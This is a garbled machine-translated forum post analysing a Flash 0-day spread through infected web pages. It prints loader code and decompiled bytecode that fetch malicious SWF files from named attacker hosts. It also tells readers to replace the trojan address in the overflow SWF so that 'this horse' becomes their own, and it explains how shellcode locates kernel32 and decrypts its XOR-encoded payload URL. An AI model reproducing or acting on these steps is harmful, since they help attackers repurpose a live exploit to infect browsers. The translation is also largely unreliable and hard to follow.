Flash 0-day detailed analysis and summary

Recently flash out a few 0day, the Forum also posted relevant news (see: http://bbs.tian6.com/viewthread.php? Tid = 4434 & extra = & page = 1 ). I also started this study about five days ago. I remember someone started the same research at the same time. so far, this 0day can affect version 90.115. the Study of Xie BA was successfully completed two days ago. this puts a lot of pressure on me ..

(1) As a preliminary study, with the help of Tim, I got two SWF network horses from several infected pages. after decompilation, the two SWF files will be downloaded again after obtaining the local flash plug-in version, and the two malicious SWF files will truly have overflow and download the virus to the local execution capability. it verifies and downloads the detailed SWF File Code It can be seen as follows:
VaR fversion = getversion ();
Loadmovie ("http://bao.5bao.net/123/" + fversion + polici.swf", _ root );
Stop ();

------------ The local flash version is obtained here .-------------
Note: The load external file command loadmovie () can load an external SWF file or JPEG file to Flash Player while playing the SWF file, so that you can display several SWF files at the same time, or switch [local] 1 [/local] between several SWF files.
1. loadmovie ("URL", target [, method])
"Url": the absolute or relative path of the SWF or JPEG file to be loaded.
Generally, the corresponding. SWF file should be placed in the same folder as the .swf file to be saved. The absolute path must have a detailed path address.
Target: the name and path of the target video clip (MC component. The target video clip is replaced with the loaded SWF file or image.
Method: Optional. Generally, this parameter is optional.

// [Action in frame 1]
_ Constantpool "fversion" "/: $ version" "http: // xioayang, COM/123/" “c.swf "" _ root"
_ Push "fversion" "/: $ version"
_ Getvariable
_ VaR
_ Push "http: // xioayang, COM/123/" "fversion"
_ Getvariable
_ Add2
_ Push pull c.swf"
_ Add2
_ Push "_ root"
_ Getvariable
_ Geturl2 flag 64
_ Stop
_ End
--------- After obtaining the version, download the real murderer SWF .-------
Action in frame 1this operator opened c.swf and pushed in root at the same time.

Finally, I downloaded the corresponding winmtr, and 0ie.swf and saved it to the local device. So far, we have obtained a total of four sample SWF, two of which overflow primary SWF. Finally, we have the capital available for comparative analysis files.

(2)After the decompilation overflows the body SWF, we can see from FLA that this SWF contains three tags, one action, one image element, and one investigation.

By comparing the two samples in a binary system, we found that the suspicious elements are the image element and the detection element. studies from the evil baboons are considered to be part of the picture. and finally locked a piece of code in the image. however, the picture is not discussed, or the investigation is garbled in 16. through several common shellcode encryption technologies, I still cannot restore useful information .. A few days ago, I started to lose direction from here. the sub-code is visible:

(3)After several days of thinking and many ideas on the principle of 0-day, we confirm that the principle of this flash 0-Day is to allow users to browse the SWF file. If the flash plug-in version of the user is equal to or less than 115, then it downloads and runs malicious SWF. overflow occurs. After overflow, the trojan will be downloaded and executed according to the Trojan address prepared by xiao. The Trojan address itself must exist in the SWF that can overflow. the reason why we cannot find the location of this Code in hexadecimal notation is that the shellcode is encrypted. so how can we find this location and identify the encryption method? Here we use reverse engineering. reverse engineering ". I used TRW, soft-ice, and w32dasm to continuously compile and debug important address breakpoints, analyze the message response function, and finally lock shellcode here:Enable master overflow SWF in hexadecimal notation

The value of note is 62. From here, the trojan address appears. before changing the trojan address, change the value to 51.
Then find:

This part is modified to the address of your horse.
For example:

So far, you have successfully changed this horse into your own.

(4) Let's continue to explore the shellcode encryption principle... We can't find this. We can only reverse-push the block stone. Open said that This shellcode was the same as the shellcode of the previous thunder 0day. XOR Encryption .
The following describes the principles of XOR encryption and decryption:
To run shellcode properly on other computers, note the following key points:
1. It is difficult for all shellcodes to ensure the memory address to which their code is loaded. To run shellcode, especially to read data in its own code (such as virus URL addresses, constants and variables such as the name of the function to be called), it must be self-positioned, obtain the virtual address in the memory.
Generally, you can obtain Program The EIP value of the current entry point can be used to locate your own code. However, the EIP value cannot be obtained directly using mov or other methods. To this end, shellcode writers use a typical method that you will see in the following shellcode.
2. shellcode must call the system API function in the process space to remotely download and run the file. So how can I get the function address? This is another key to remote code injection: function address relocation.
As long as the DLL of the API is loaded by the process, you can get the function address and call it through getprocaddress exported by kernel32.dll. However, getprocaddress itself is also a function. We need to get its address first! It looks like an endless loop.
In this case, the shellcode author must simulate the DLL Loading Method of the program and create a similar "input table" for his shellcode code ". To obtain the address of the getprocaddress function in kernel32.dll, you must also read the output table of kernel32.dll. The problem is how to locate the output table of kernel32.dll.
The problem is transformed into a PE file structure reading problem. As long as the base address of kernel32.dll in the virtual space of the process (DOS file header, that is, the location of MZ) is obtained, you can read the PE File Header ("; pe") at the 03ch offset) offset relative to the DOS file header and calculate the PE File Header address. At 78h In the PE File Header structure, it is the address of the output table. By retrieving the output table, you can get the offset of the address of the getprocaddress function, which is further changed to the entry point address in the virtual space.
The problem goes through layer-by-layer and becomes how to obtain the "base address of the kernel32.dll file in the process space ". Hard coding? Then you simply hardcoded the function address, isn't it easier ?! Shellcode authors have better practices.
When talking about the base address of the DLL, a structure is ready --

Peb! FS: [0x30]!

I have not fully summarized how to crack the XOR encrypted shellcode on this flash0day. I will add it after the summary. Here I will list two articles.ArticleFor your reference:

Http://bbs.pediy.com/showthread.php? T = 46068
Http://hi.baidu.com/yicong2007/blog/item/d8355616879b964921a4e9e8.html